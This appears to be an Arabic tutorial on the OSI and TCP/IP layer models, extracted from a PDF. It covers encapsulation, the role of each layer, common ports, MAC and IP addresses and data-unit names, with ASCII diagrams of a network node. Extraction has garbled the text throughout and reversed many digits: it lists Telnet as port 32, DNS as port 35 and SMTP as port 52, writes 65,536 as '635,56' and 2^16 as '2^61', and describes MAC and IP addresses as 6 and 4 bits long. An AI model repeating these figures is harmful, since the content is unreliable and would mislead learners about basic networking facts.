‫الطبقة الولي ‪ -‬الطبقة الفیزيائیة ‪                                   Physical‬‬ ‫كیف يعمل الطبقات ؟‪                                                        ‬‬ ‫كل طبقة من طبقات مكدس ‪ OSI‬مسئولة عن وظیفة معینة او مجموعة وظائف‬ ‫‪ .‬الطبقة الثلث العلي( طبقة التطبیقات حتي الجلسة ) عادة تدار من قبل‪   ‬‬ ‫التطبیق نفسھ ا‪ ،‬وبذلك المستخدم لديه بعضا من التحكم ‪ .‬اما باقي ‪ 4‬طبقات‪ ‬‬ ‫عادة تدار من قبل الحاسوب نفسھا ‪                                         .‬‬ ‫من الصعب جدا اكتشاف مالذي يفعله المكدس من في الطبقات السفلي ‪   ،‬‬ ‫ولكن ھ ناك منطقة داكنة بین الطبقات العلیا والسفلي ولكن كل طبقة تؤثر في‬ ‫غیرھا ‪                                                                     ..‬‬ ‫‪                                                                          ....‬‬ ‫‪                                     24‬‬ ‫تبادل البیانات‪                                                                 ‬‬ ‫يحدث في كل طبقات نموذج ‪ OSI‬تبادل للمعلومات فیما بین الطبقات‪ ..‬معلومات‬ ‫عن الطبقة الحالیة تضاف إلي ترويسة أو ذيل الرزمة قبل تسلیمھا الي الطبقة‪ ‬‬ ‫التالیة‪                                                                        ،‬‬ ‫والطبقة التالیة بدورھا تضیف معلومات بنفس الشكل ھكذا دوالیك ‪           ....‬‬ ‫واضافة معلومات الي الرزمة تسمي تغلیف ‪ ، Encapsulation‬والطبقة الوحیدة‪  ‬‬ ‫التي ل تقوم بإضافة معلومات إلي الرزمة ھي الطبقة الفیزيائیة ‪ .‬عندما‪         ‬‬ ‫يستقبل الجھ از المرسل الیه رزمة‪ ،‬تقوم بجرد معلومات كل طبقة في نفس‪    ‬‬ ‫الطبقة ( طبقة الجلسة تقوم بجرد معلومات المضافة من قبل طبقة الجلسة‪   ‬‬ ‫في الجھ از المرسل ) وتمرر الباقي الي الطبقة التالیة ‪ ...‬حتي تصل إلي طبقة‪ ‬‬ ‫التمثیل والطبقة تمرر الرزمة علي شكل البیانات الصلیة ( بدون المعلومات‪     ‬‬ ‫الترويسیة ) ‪                                                              ....‬‬ ‫طبقة التطبیقات‪                                                              ‬‬ ‫طبقة التطبیقات الطبقة الوحیدة التي يتفاعل معھا المستخدم ‪ ،‬وھي تقدم‪   ‬‬ ‫الخدمات مباشرة إلي التطبیقات ‪ .‬طبقة التبیطقات يمكنھا فحص الموارد‪        ‬‬ ‫المتبقیة‪ ،‬تزامن التصال‪ ،‬وتعريف اطراف التصال ‪ ..‬وتطبیقات ‪ TCP/IP‬العاملة‪   ‬‬ ‫في ھذه الطبقة ‪                              .. POP3 ، SMTP ،Telnet ،FTP ..‬‬ ‫طبقة التمثیل ‪                                                              ..‬‬ ‫طبقة التمثیل الطبقة الوحیدة التي يمكنھا تغییر البیانات في الرزمة ‪.‬وھي تھتم‬ ‫بتفاصیل التشفیر والتحويل والتأكد من أن البیانات المرسلة إلي الطرف الخر‪   ‬‬ ‫صالح للتعامل والقراءة في الطرف الخر ‪ ..‬وانواع البیانات في ھذه الطبقة‪       ‬‬ ‫تشمل ‪                                   3.. JPEG,GIFF,TIFF,DOC,MPEG,MP‬‬ ‫عملیة ضغط وتشفیر البیانات قبل ارسال الرزمة تتم في ھذه الطبقة ‪         ...‬‬ ‫طبقةالجلسة ‪                                                             ...‬‬ ‫ھ ذه الطبقة تتولي انشاء التصال وقطعھا بین طبقة التمثیل‪                      ‬‬ ‫والخدمات التي تقوم بالطلبیات والجابة علي الطلبیات تتم ادارتھا بواسطة‪     ‬‬ ‫البروتوكولت الموجودة في ھذه الطبقة وھ ي تشمل بروتوكول معلومات المطقة‬ ‫‪ ,Information Protocol/ZIP Zone‬بروتوكول التحكم في الجلسة ‪    Session‬‬ ‫‪ Control Protocol/SCP‬و خدمة ‪ AppleTalk‬التي تدير خدمة ربط السماء ‪   ...‬‬ ‫‪                                        34‬‬ ‫طبقة النقل ‪                                                                      :‬‬ ‫طبقة النقل مسئولة عن توفیر نقل موثوق للمعلومات عبر الشبكات ‪         ...‬‬ ‫وھ ي تكسب موثوقیة التصالت بطرق التیة ‪                                    :‬‬ ‫‪ - 1‬التحكم في التدقف ‪ : dataflow control‬وذلك حتي تكون سرعة ارسال‪   ‬‬ ‫البیانات من المرسل اسرع من سرعة معالجة المستقبل لھا ‪              .....‬‬ ‫‪ – 2‬المزج ‪ ،،Multiplexing‬لتمكین البیانات القادمة من تطبیقات مختلفة ان‪    ‬‬ ‫تتوضع في وصلة وحیدة ‪                                                          .‬‬ ‫‪ - 3‬انشاء دوائر ظاھرية ‪Virtual Cuirct‬بین المضیفات المتصلة‪ ،‬حیث يتم‪       ‬‬ ‫انشاءھا وفصلھا من قبل ھذه الطبقة ‪                                          ..‬‬


‫‪ : 4‬فحص الخطاء ‪ Error checking‬من أجل الخطاء الواقعة أثناء النقل ‪        ..‬‬ ‫‪ : 5‬طلب ارسال البیانات التالفة ‪                                               ...‬‬ ‫والبروتوكول الساسي في مجموعة ‪ TCP/IP‬والقابعة في ھذه الطبقة ھي‪    ‬‬ ‫بروتوكول ‪ TCP‬نفسھا ‪ ...‬والفرق بین ‪ TCP‬و ‪ UDP‬التي تعتبر من بروتوكولت‪   ‬‬ ‫ھذه الطبقة‪ ،‬الفرق بینھما فخص الخطاء وتصحیحھا ‪ ....‬ولذلك تعتبر ‪     TCP‬‬ ‫بروتوكول موثوقا‪ ،‬اما ‪ UDP‬فبروتوكول غیر موثوق‪                                ...‬‬ ‫منطقیا كل مضیف ( حاسوب ) يمكنه التعامل مع ‪ 635,56‬منفذ (‪  Port )2^61‬‬ ‫من أجل ‪TCP‬و ‪ . UDP‬وكل منفذ يمكن الوصول الیه من قبل برنامج واحد في‪  ‬‬ ‫وقت واحد‪ .‬فمثل مزود ‪ telnet‬يعمل مع منفذ ‪ TCP‬رقم ‪ ،32‬واذا كان المنفذ‪    ‬‬ ‫مشغول من طرف ‪ Telnet‬فل يستطیع استخدامھ ا برامج اخري ‪ .‬وبعض المنافذ‬ ‫من الممكن أن تكون مستعمل لكثر من برامج مثل منفذ ‪ 35‬الذي يستعمله‪  ‬‬ ‫مزود ‪ DNS‬وحصان طروادة الشھیرة ‪ ،Back Orifice‬يراقب منفذ معیا من اجل‪   ‬‬ ‫وصول البیانات او طلب التعامل من جھات اخري ‪ .‬والبرامج مثل ‪ PcAnyWhere‬‬ ‫يعمل في ھذا النمط ‪                                                             .‬‬ ‫ولكن اذا أراد م دير الشبكة قید استخدام ‪ Telnet‬من الممكن ربطه بمنفذ آخر‪ ‬‬ ‫غیر المنفذ القیاسي ‪                                                         . 32‬‬ ‫‪                                         44‬‬ ‫بعض المنافذ العامة‪                                                        ‬‬ ‫منافذ ‪                                                                 TCP‬‬ ‫‪                                                                  12 ­ FTP‬‬ ‫‪                                                               32 ­ Telnet‬‬ ‫‪                                                                52 ­ SMTP‬‬ ‫‪                                                                 35 ­ DNS‬‬ ‫منافذ ‪                                                                UDP‬‬ ‫‪                                                                 35 ­ DNS‬‬ ‫‪                                                                96 ­ TFTP‬‬ ‫‪                                                              161 ­ SNMP‬‬ ‫‪                                                                 025 ­ RIP‬‬ ‫طبقة الشبكات ‪                                           Network Layer‬‬ ‫طبقة الشبكات يسمح بدمج وصلت معلومات متعددة في وصلة واحدة ‪    ...‬‬ ‫عادة بروتوكول ھ ذه الطبقة تعتبر بروتوكولت التوجیه ‪ Routing‬ومع ذلك ھناك‪  ‬‬ ‫بروتوكولت اخري في ھ ذه الطبقة ‪ .‬من بروتوكولت التوجیه ‪                 :‬‬ ‫‪ Internet Protocol/IP‬و ‪  Open Shortest ،Border Gateway Protocol/BGP‬‬ ‫‪ Routing Information Protocol/RIP, Automatic Route ،First/OSPF Path‬‬ ‫‪                                    of the IP Protocol discovery subsets‬‬ ‫العناوين المنطقیة ‪                                      Logical Addresses‬‬ ‫العنوان المنطقي عنوان تعطي لبطاقة واجھ ة الشبكة‪ ،‬وبذلك يتمكن مدير‪     ‬‬ ‫الشبكة من معرف الشبكة التي ينتمي الیھا حاسوب ما‪                    .‬‬ ‫ويسمح أيضا بتوفیر مضیف متعدد العناوين( التي تملك عنوان بروتوكول طبقة‪  ‬‬ ‫الشبكة ) التي بامكانه العمل بجسر للشبكة ‪                             .‬‬ ‫طبقة ربط البیانات ‪                                       Data Link Layer :‬‬ ‫وظیفة ھ ذه الطبقة تقديم سبیل موثوق من اجل نقل البیانات في الشبكة‪   ،‬‬ ‫ويستخدم عنونة فیزيائیة من ترحیل البیانات الي العالم الخارجي‪ .‬وھذا الطبقة‬ ‫ايضا تستیطع تعريف طوبولوجیا الشبكة‪                                    .‬‬ ‫في الحقیقة ھ ذه الطبقة تتكون من طبقتین فرعییتن‪                        ‬‬ ‫‪                                   54‬‬ ‫الطبقة الفرعیة ‪                                           The LLC Sublayer‬‬ ‫طبقة التحكم في الربط المنطقي ‪ LLC‬تدير اكثر من اتصالت في وصلة شبكة‪  ‬‬ ‫وحیدة‪ .‬والمواصفات تم تحديدھا في ‪ IEEE 2.208‬والمواصفات تدعم التصال‪   ‬‬ ‫‪                         .connection oriented services connectionless and‬‬


‫الطبقة الفرعیة ‪                                          The MAC Sublayer‬‬ ‫طبقة التحكم في الوصول تدير في وصول البروتوكول الي وسیط فیزيائي (‪      ‬‬ ‫العتاد) مثل كبل ايثرنت ‪ .‬مواصفات ‪ IEEE MAC‬تعرف عناوين ‪ MAC‬التي تعرف‪  ‬‬ ‫بالعنوان الفیزيائي والتي تمكن اكثر من جھاز في ھذه الطبقة ؟‪               .‬‬ ‫العناوين الفیزيائیة ‪                                       Physical Addresses‬‬ ‫العنوان الفیزيائي ھ و عنوان موجود في بطاقات مثل بطاقة ايثرنت‪ ،‬ويشبه الرقم‬ ‫التسلسلي ‪.‬وھو بطول ‪ 6‬بتات ويمثل بالستعشري ‪ .‬واول ثلث بايتات تستخدم‬ ‫للتعريف علي منتج البطاقة ‪ .‬وھذه البايتات الثلث تدمج مع البايتات الباقیة‪    ‬‬ ‫وتنتج منھ ا رقم معرف فريد للبطاقة ‪ .‬واذا نظرت في بطاقة واجھة الشبكة ‪ NIC‬‬ ‫سوف تري رقما مثل ھذه ‪ . FF A3 B0 A 4F 133‬واذا كان ھذا المیزة غیر‪       ‬‬ ‫موجودة في البطاقة‪ ،‬فالطريقة الوحیدة من اجل توجیه البیانات عبر الشبكات‪  ‬‬ ‫ھو اعطاء كل جھاز عنوانا ‪ TCP/IP‬او ‪ IPX/SPX‬فريدة ‪                          .‬‬ ‫الطبقة الفیزيائیة ‪                                         The Physical Layer‬‬ ‫ھذه الطبقة مسئولة عن الحصول علي تدفق البتات ووضعھا في الطريق في‪  ‬‬ ‫العتاد الشبكي ‪                                                             .‬‬ ‫والطبقات الفیزيائیة ‪ ،Physical‬ربط المعلومات ‪ ،Data­Link‬والشبكة‪             ‬‬ ‫‪ Networking‬كل ھذه الطبقة لیست خاصة بالشبكة من نوع ‪ LAN‬بل توجد في‬ ‫الشبكات واسعة النطاق ‪ WAN‬ايضا‪                                          .‬‬ ‫= مجموعة ‪ TCP/IP‬وطبقاتھا =‪                                               ‬‬ ‫تكلمنا عن طبقات ‪ ISO/OSI‬وأقسامھا ( تشمل كل مكونات الشبكة ولیست‪   ‬‬ ‫البروتوكولت فقط ) ‪ ،‬والن نتكلم عن الطبقات الخاصة بعائلة ‪ TCP/IP‬اي طبقات‬ ‫البروتوكولت ‪                                                              ....‬‬ ‫مجموعة بروتوكولت ‪ TCP/IP‬بحد ذاتھا تم تطويرھا في شكل طبقات كل طبقة‪ ‬‬ ‫‪                                      64‬‬ ‫مسؤولة عن جزء معین في عملیة التصال ككل‪ ..‬وكل طبقة تضم المزيج من‪ ‬‬ ‫البروكولت في ھذه المجموعة ‪ ..‬وھي اربع طبقات كما يلي‪                 ‬‬ ‫‪Application Layer Telnet, FTP, e­mail, LPD SNMP TFTP SNMP Xwindow‬‬ ‫‪                                                                       .etc‬‬ ‫‪                               Host to Host/Transport Layer TCP, UDP‬‬ ‫‪            Internet Layer IP RFC791, ICMP RFC792, IGMP, ARP,RARP‬‬ ‫‪     – 498Network Access Layer device driver and interface card, RFC‬‬ ‫‪                             Ethernet, Token Ring,FDDI Ethernet/ Fast‬‬ ‫‪                           DoD­TCP/IP Suit Model OSI Reference Model‬‬ ‫طبقة التطبیقات‪                                                          ‬‬ ‫طبقة المعالجة والتطبیقات طبقة التمثیل‪                                   ‬‬ ‫طبقة الجلسة‪                                                             ‬‬ ‫المضیف ‪ -‬المضیف طبقة النقل‪                                              ‬‬ ‫النترنت طبقة الشبكة‪                                                      ‬‬ ‫الوصول الي الشبكة طبقة وصل البیانات‪                                    ‬‬ ‫الطبقة الفیزيائیة‪                                                          ‬‬ ‫نلحظ ان ‪ OSI‬تضم طبقات زائدة ل تدخل في ضمن البروتوكولت ‪          ...‬‬ ‫يمكننا تقسیم البروتوكولت حسب وظیفتھا الى ثلث أقسام (ولیست‪       ‬‬ ‫الطبقات )‪                                                                :‬‬ ‫‪ - 1‬بروتوكولت تطبیقات ‪                            .Application Protocols‬‬ ‫‪ - 2‬بروتوكولت نقل ‪                                 .Transport Protocols‬‬ ‫‪ - 3‬بروتوكولت شبكة ‪                                .Network Protocols‬‬ ‫تعمل بروتوكولت التطبیقات في الطبقات العلیا من ‪ Protocol Stack‬و تتلخص‪ ‬‬ ‫‪                                   74‬‬ ‫مھمتھ ا في تبادل البیانات و تحقیق التفاعل بین التطبیقات و من أمثلتھا‪      :‬‬ ‫‪                                                )Server Message Block (SMB‬‬


‫‪                                    )Novell's NetWare Core Protocols (NCPs‬‬ ‫‪                 )File Transfer Access and Management Protocol (FTAMP‬‬ ‫و من بروتوكولت التطبیقات الخاصة بالنترنت ‪                                  :‬‬ ‫‪                                                 )File Transfer Protocol (FTP‬‬ ‫‪                                                                        Telnet‬‬ ‫أما بروتوكولت النقل فتستخدم لتوفیر جلسات التصال بین الكمبیوترات على‪  ‬‬ ‫الشبكة و ھ ي مسئولة عن صیانة جودة و دقة المعلومات المنقولة بین‪        ‬‬ ‫الجھزة‪ ،‬و من أمثلتھا‪                                                         :‬‬ ‫الجزء الناقل من بروتوكول میكروسوفت ‪                                .NWLink‬‬ ‫الجزء الناقل من بروتوكول ‪                                             NetBEUI‬‬ ‫‪                                          )Sequenced Packet Exchange (SPX‬‬ ‫‪                                        )Transmission Control Protocol(TCP‬‬ ‫بینما تقدم بروتوكولت الشبكة خدمات ربط ‪ Link Services‬و تتلخص مھامھا بما‬ ‫يلي‪                                                                           :‬‬ ‫‪ -1‬عنونة و توجیه المعلومات ‪                              .Adressing/Routing‬‬ ‫‪ -2‬البحث عن إخطاء في عملیة الرسال ‪                      .Error checking‬‬ ‫‪ -3‬التعامل مع طلبات إعادة الرسال ‪                                           .‬‬ ‫‪ -4‬تحديد قوانین التصال في بیئات محددة من الشبكات مثل إثرنت و ‪  Token‬‬ ‫‪                                                                          .Ring‬‬ ‫من المثلة على ھذه البروتوكولتما يلي‪                                      :‬‬ ‫‪                                                        )Internet Protocol (IP‬‬ ‫‪                                      )Internet work Packet Exchange (IPX‬‬ ‫وكل طبقة لديھا عمل معین‪                                                    ‬‬ ‫‪ - 1‬طبقة الوصل واحیانا تدعي طبقة ربط البیانات ‪ Dara­Link Layer‬او طبقة‪   ‬‬ ‫واجھة الشبكات ‪ Network Interface Layer‬تشمل عادة المشغل ‪    device‬‬ ‫‪ driver‬في نظام التشغیل وتقابل بطاقة واجھة الشبكة في الحاسوب‪ .‬والثنین‬ ‫معا تعالج كل ما تتطلب التعامل مع العتاد والوسائط ( السلك الخ ) ‪        ...‬‬ ‫‪                                       84‬‬ ‫‪ - 2‬طبقة الشبكات تدعي احیانا ‪ Internet layer‬تعالج حركة الرزمة مسیرتھا‪    ‬‬ ‫في الشبكة مثل توجیه الرزم‪ ،‬وبروتوكولت مثل‪                               ‬‬ ‫‪          ,IP/Internet Protocol, ICMP/Internet Message Control Protocol‬‬ ‫‪ IGMP/Internet Group Management Protocol‬تخدم في ھذه الطبقة مثل ‪...‬‬ ‫‪ - 3‬طبقة النقل تقوم بمعالجة سیر البیانات ‪ Flow of data‬بین الطرفین وتقدمھا‬ ‫لطبقة التطبیقات التي فوقھا ‪ ..‬وفي الحقیقة ھناك نوعان من بروتوكول النقل‪   ‬‬ ‫‪ TCP‬و ‪                                                              . UDP‬‬ ‫‪ - 4‬طبقة التطبیقات تقوم بمعالجة تفاصیل البرامج ‪ ...‬مثل ‪ telnet,ftp,smtp‬الخ‪ ‬‬ ‫‪                                      94‬‬ ‫‪TCP/IP 4 Idiots‬جزء الثاني‪                    ‬‬ ‫للكاتب‪                                                           SaD.jAcKAl:‬‬ ‫‪ TCP/IP‬تكملة لطبقات البروتوكولت‪                                             ‬‬ ‫كما قلنا سابقا نقسم ‪ TCP/IP‬حسب عملھا إلي أربع طبقات ونصیر علـي ھـذا‬ ‫التقسیم فیما يلي ‪ ....‬ونتكلم عن كل طبقة علي حدة وبشيء من التفصیل ‪..‬‬ ‫( كان من المفروض ان يكون ھذا المقال شرحا شامل للطبقات الربع ولكن بـض‬ ‫القراء طلبو تقسیم المقال الي جزئیات صغیرة ووولـذلك تـم تقـسیمه الـي عـدة‬ ‫اجزاء وتم تأخیر موضوع ‪ Subnetting‬إلي أجل آخر ‪                      ( :D‬‬ ‫التكوين المنطقي لبسط عقدة في الشبكة كما يلي‪                         ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                          ‬‬ ‫‪                      |      | network applications‬‬ ‫|‪                            |                      ‬‬ ‫|‪                           |... / | \ .. / | \ ...‬‬


‫|‪                           |    ­­­­­      ­­­­­    ‬‬ ‫|‪                        |     ||TCP       ||UDP        ‬‬ ‫|‪                           |    ­­­­­      ­­­­­    ‬‬ ‫|‪                            |       \      /       ‬‬ ‫|‪                           |        ­­­­­­­­        ‬‬ ‫‪                                       05‬‬ ‫|‪                            |       | | IP          ‬‬ ‫|‪                           ­­­­­­*­ ­­­­­ |          ‬‬ ‫|‪                           | || |ARP                 ‬‬ ‫|‪                            | ­­­­­ |               ‬‬ ‫|‪                            |     | \              ‬‬ ‫|‪                            |     ­­­­­­            ‬‬ ‫|‪                          |     ||ENET                ‬‬ ‫|‪                           |     ­­@­­­              ‬‬ ‫­­­­­­­­­­|­­­­­­­­­­­­­­­­­‪                          ‬‬ ‫|‪                                        ‬‬ ‫‪                        ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­o‬‬ ‫‪ Ethernet Cable‬كبل ايثرنت‪                        ‬‬ ‫الصورة ‪ – 1‬عقدة مبسطة لشبكة ‪                   TCP/IP‬‬ ‫ھذا تكوين منطقي لعقدة أو جھ از في الشبكة تعتمد علي معمارية الطبقـات ‪...‬‬ ‫والتي تحدد سلوك ھذا الجھ از علي النترنت ‪ ...‬المربعات تمثـل مرحلـة معالجـة‬ ‫البیانات ‪ ,,‬والخطـوط توصـل المربعـات ترينـا الطريـق التـي تـسلكه البیانـات إلـي‬ ‫المام ‪                                                                      ..‬‬ ‫أما الخط الفقي في السفل فتمثل كبل ايثرنت‪ ،،‬و ‪O‬تمثل الـ ‪ Transceiver ..‬‬ ‫و النجمة * تمثل عنوان ‪ IP‬و@ تمثل عنوان ‪                        Ethernet‬‬ ‫‪                                       15‬‬ ‫=== بنیة وحدة بیانات المرسلة والمصطلحات‪                                ‬‬ ‫‪                      The formation of a transmitted unit of information‬‬ ‫رزم البیانات تنتقل من طبقة إلي أخرى فـي نمـوذج ‪ OSI‬حتـى الطبقـة الخیـرة‬ ‫تتعرض للتغییر‪ ،‬وھ ي إضافة ترويسات والتـذيیلت إلـي الـرزم ‪ .‬وفـي كـل طبقـة‬ ‫تسمي وحدة البیانات بأسماء مختلفة ‪                                      :‬‬ ‫الطبقة‪                  ‬‬ ‫اسم الطبقة‬ ‫اسم وحدة البیانات‬ ‫‪           7‬بیانات‪/‬معلومات المستخدم ‪           user data‬‬ ‫التطبیقات‬ ‫‪          6‬بیانات ‪                                     data‬‬ ‫التمثیل‬ ‫‪              5‬بیانات ‪                                data‬‬ ‫الجلسة‬ ‫‪               4‬مقطع ‪                                 segment‬‬ ‫النقل‬ ‫‪          3‬رزمة ‪                                    packet‬‬ ‫الشبكة‬ ‫‪    2‬إطار ‪                                      frame‬‬ ‫ربط البیانات‬ ‫‪       1‬بتات‪/‬قناة بتات ‪                        bit steam‬‬ ‫الفیزيائیة‬ ‫‪ Packet‬رزمة‪                                                                ‬‬ ‫‪ Datagram‬جزئیة بیانات‪                                                   ‬‬ ‫‪ Segment‬مطقع‪                                                            ‬‬ ‫‪ Stream‬تیار‪                                                                ‬‬ ‫‪ Frame‬إطار‪                                                                 ‬‬ ‫‪ data flow‬سريان البیانات‪                                                  ‬‬ ‫‪                                    25‬‬ ‫‪ Message‬رسالة‪                                                              ‬‬ ‫وھنا بعض المصطلحات الخرى بالتفصیل‪                                      ‬‬ ‫جزئیة بیانات ‪  Datagram :‬رزمة المتواجدة في طبقة الـشبكات التـي تـستخدم‬ ‫خدمات الشبكة من نوع التصال الحقیقي ‪                                   .‬‬


‫الرسالة ‪ Message :‬تسمیة أخرى للبیانات المتواجدة فوق طبقة الشبكة‪ ،‬وأيضا‬ ‫ھذه الصطلح تطلق علي البیانات في طبقة التطبیقات ‪                      .‬‬ ‫الخلیة ‪ Cell :‬وحدة بیانات التي تتواجد في طبقة ربط البیانات ‪ Data­Link‬وبطول‬ ‫متغیر‪ ،‬واغلب الحیان توجد في شبكات من نوع ‪ WAN‬مثل ‪ ATM ) 35‬بت )‪    .‬‬ ‫وحدة بیانات ‪           data unit‬‬ ‫‪:‬اصطلح عام للبیانات في أي طبقة كان‪.‬‬ ‫المشغل ‪ Driver :‬برنامج تقوم بالتصال مباشرة مع كرت واجھة الـشبكة مثـل‪  ‬‬ ‫‪                                                                   . Ethernet‬‬ ‫والنمـوذج ‪ Module‬برنـامج تقـوم بالتـصال مـع المـشغل‪ ،‬أو تطبیقـات الـشبكة‪ ‬‬ ‫‪Network Application‬أو مع نموذج آخر‪                                     ..‬‬ ‫فكما نري تاخذ وحدة بیانات ‪ data‬عدة اسماء مختلفة تبعا لموقعھا في مكـدس‬ ‫‪                                                                       TCP/IP‬‬ ‫في طبقة ايثرنت تدعي إطار ايثرنت‪ ،‬واذا كان بـین طبقـة ايثرنـت ونمـوذج ايبـي‬ ‫تـدعي رزمـة ‪ ،IP‬واذا كـان بـین نمـوذج ‪ IP‬ونمـوذج ‪ UDP‬تـدعي جزئیـة بیانـات‬ ‫ـ‪   ‬‬ ‫ـ‬ ‫ـ ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫‪  ،datagram‬واذا كان بین نموذج ‪ IP‬ونمـوذج ‪ TCP‬تـدعي مطقـع ‪ ، TCP‬واذا كـان‬ ‫في طبقة تطبیقات الشبكة‪                                                    ‬‬ ‫‪                                     35‬‬ ‫تدعي رسالة تطبیق ‪... Applicatio Message‬للمزيد حول ھذه السـماء يمكنـك‬ ‫مراجعة الوثیقة المعنونة ‪                                               2211RFC‬‬ ‫==== نظرة إلي تكوين عقدة في الشبكة من زاوية البروتوكولت‪             ...‬‬ ‫=== مسار البیانات في المكدس‪                                                ‬‬ ‫والن دعنا نتبع البیانات مـسارھا فـي المكـدس كمـا ھـي فـي الـصورة الولـى‪،‬‬ ‫البرنامج التي تعتمد علي ‪ TCP‬تمرر البیانات من طبقة التطبیقـات إلـي نمـوذج‪  ‬‬ ‫‪ ،TCP‬أما البرنامج التي تعتمد علي ‪ UDP‬تمررھا علي نموذج‪ .. UDP‬برامج ‪ FTP‬‬ ‫تعتبر مثل علي البرامج التي تعتمـد علـي‪ ، TCP‬والمكـدس فـي حالتھـا تكـون‪  ‬‬ ‫‪FTP/TCP/IP/Ethernet‬أما ‪ SNMP‬مثل تعتبر مثال علي البـرامج المعتمـدة علـي‬ ‫‪ UDP‬والمكدس في حالتھا تكون ‪                     SNMP/UDP/IP/Ethernet‬‬ ‫‪       1 2 3 ... n                   1 2 3 ... n‬‬ ‫^‪        | \      /    |            || \        /      ‬‬ ‫|‪         / ||\        |             ||\       /       ‬‬ ‫‪       ­­­­­­­­­­­­­ flow             ­­­­­­­­­­­­­­­­ flow‬‬ ‫‪       ||multiplexer    of             ||de­multiplexer     of‬‬ ‫‪       ­­­­­­­­­­­­­ data             ­­­­­­­­­­­­­­­­ data‬‬ ‫|‪           |         |                  |            ‬‬ ‫|‪            |        v                   |            ‬‬ ‫‪                                        45‬‬ ‫‪             1                          1‬‬ ‫الصورة الثانیة ‪ :‬المازجات والموزعات‪                                             ‬‬ ‫‪        n­to­1 multiplexer and 1­to­n de­multiplexer‬‬ ‫كمـا فـي الـصورةا الثانیـة نمـوذج ‪ TCP‬ونمـوذج ‪ UDP‬ومـشغل ‪ Ethernet‬تعتبـر‪   ‬‬ ‫‪Multiplexer‬مازجات ‪) 1– N ­ to‬أي تضع عدة قنـوات فـي قنـاة واحـدة مـن اجـل‬ ‫إرسالھا إلي الخارج ) ‪                                                        ....‬‬ ‫وتعتبـر موزعـات ‪ De­Multiplexer‬أيـضا ‪ 1­ to­ n‬فـي نفـس الوقـت ( أي تـوزع‬ ‫ـ‪     ‬‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫البیانات الواردة في قناة واحدة إلي عدة قنوات )‪                                 ‬‬ ‫والن ‪ :‬فلنقــل أن ھنــاك بیانــات واردة‪ ،،‬أول محطتھــا ســتكون ايثرنــت ( وھنــا‬ ‫تسمي إطار‪ ( Ethernet Frame‬ومشغل ايثرنت تقوم بتمريرھا إلي العلى ‪ ،‬أما‬ ‫نموذج بروتوكول‪ ARP‬حل العناوين أو نموذج بروتوكول‪ IP‬فـي حقـل النـوع ‪ Type‬‬ ‫في إطار ايثرنت تحدد فیما إذا كانت تمررالي ‪ ARP‬أو‪                           IP‬‬ ‫فلنقل أن البیانات مررت إلي نموذج ‪ ، IP‬و ‪ IP‬تقوم بـدورھا بتمريـر البیانـات إلـي‬


‫العلـى ‪ TCP‬أو ‪ UDP‬حـسبما تخبرھـا حقـل ‪ Protocol‬فـي ترويـسة ‪ IP‬لـرزم‬ ‫البیانات ‪                                                                        ..‬‬ ‫فلنقـل أنھ ـا أي البیانـات مـررت إلـى نمـوذج‪ ،، UDP‬وتـسمي ھنـا ‪  Application‬‬ ‫‪Message‬وبدورھ ا تمرر إلي تطبیق الشبكة حسبما تخبرھا حقـل المنفـذ ‪ Port‬‬ ‫في ترويسة الرزمة ‪                                                            ...‬‬ ‫‪                                        55‬‬ ‫وإذا مررت إلى ‪ TCP‬بنفس الشكل تمرر إلى تطبیق الشبكة حسب حقـل ‪ Port‬‬ ‫في ترويسة‪                                                                TCP ..‬‬ ‫عملیة المـزج ( مـزج بیانـات القنـوات القادمـة مـن اعلـي الطبقـة إلـي الطبقـات‬ ‫السفلي ) سھ لة نسبا ‪ ..‬فكـل نمـوذج‪ /‬بروتوكـول تقـوم بإضـافة ترويـسة‪/‬نھايـة‬ ‫خاصة بھا إلى رزمة البیانات ‪ ..‬وبذلك يمكن توزيعھ ا في الطرف الخر ‪          ...‬‬ ‫البیانات القادمة مـن بـرامج تطبیقـات الـشبكة تمـرر سـواء إلـى ‪ TCP/UDP‬إلـى‬ ‫السفل ‪ ،‬فنموذج ‪ IP‬وأخیرا الطبقة الفیزيائیة ‪ Network Interface Driver‬مثـل‪ ‬‬ ‫‪                                                                       .. Ethernet‬‬ ‫وغني عن الذكر‪ ،‬أن تقنیة إنترنت تدعم أنواع عتاد مختلفة للشبكات‪ ،،‬واليثرنت‬ ‫تعتبر اكثر شیوعا في الشبكات الفیزيائیة ‪                                    ...‬‬ ‫الجھاز في صورة رقـم بـــ لـديھا واجھ ـة‪ /‬اتـصال ايثرنـت واحـدة ‪ ....‬وبـذلك لـديھا‬ ‫عنـوان ايثرنـت أو ‪ MAC Address‬مكونـة مـن ‪ 6‬بايتـات‪ ،‬اي ‪ 84‬بتـات‪ 42 ...‬منھـا‬ ‫رقم تعريف خاص للشركة المنتجة ‪                                             ..‬‬ ‫ونفس الجھاز لديھا عنوان ‪ IP‬مكونة من ‪ 4‬بتات كما ذكرنا أعـله ‪ ..‬ھـذا العنـوان‬ ‫تتواجد في المكدس في اسفل نموذج‪ ، IP‬وتكون لكل جھاز في النترنت عنوان‪ ‬‬ ‫‪IP‬وحید ‪                                                                         .‬‬ ‫والجھ ـاز المتـصل بالنترنـت دائمـا تعـرف عنوانھـا الخـاص سـواء عنـوان ‪ IP‬أو‪  ‬‬ ‫ـ‪              ‬‬ ‫ـ‬ ‫ـ‬ ‫ــ‬ ‫ـ ـ‬ ‫ـ‬ ‫ـ‬ ‫‪                                                                      ... Ethernet‬‬ ‫( لحظ أننا نتكلم عن جھ از متصل بشبكة أي عن عقدة ما في الشبكة ‪    ) ...‬‬ ‫والن نأخذ شكل آخر للجھاز ‪                                                  ....‬‬ ‫الجھ از إذا كان متصل إلى بطاقتین ايثرنت ستكون كما يلي المكدس‪              ‬‬ ‫‪                                        65‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪    ‬‬ ‫|‪|      network applications ‬‬ ‫|‪      |                      ‬‬ ‫|‪     |... \ | / .. \ | / ...‬‬ ‫|‪     |     ­­­­­      ­­­­­   ‬‬ ‫|‪  |     |TCP|         |UDP|      ‬‬ ‫|‪     |     ­­­­­      ­­­­­   ‬‬ ‫|‪      |        \      /      ‬‬ ‫|‪     |         ­­­­­­­­       ‬‬ ‫|‪     |         | IP |         ‬‬ ‫|‪    | ­­­­­ ­*­­­­*­ ­­­­­ ‬‬ 